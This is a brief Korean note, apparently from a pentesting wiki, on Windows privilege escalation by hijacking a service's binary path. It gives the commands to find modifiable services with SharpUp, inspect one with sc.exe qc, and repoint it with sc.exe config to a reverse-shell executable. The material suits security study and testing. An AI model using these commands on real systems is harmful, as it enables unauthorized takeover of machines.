침투한 시스템 제어 권한으로 실행 중인 서비스 바이너리 경로를 변조할 수 있다면, 서비스가 재실행 될 때 악성 코드를 실행시켜 시스템 권한을 탈취할 수 있습니다.
종종 binPath 인자를 입력할 때 경로 앞에 공백을 붙여야 하는 경우가 있습니다.
Last updated 6 months ago
# 바이너리 경로 쓰기 권한이 있는 서비스 열거 .\SharpUp.exe audit ModifiableServices # 변경할 서비스 원본 바이너리 확인 sc.exe qc ExecNotepad # 바이너리 경로 변경 sc.exe config ExecNotepad binPath="C:\Users\Mick3y\reverse.exe"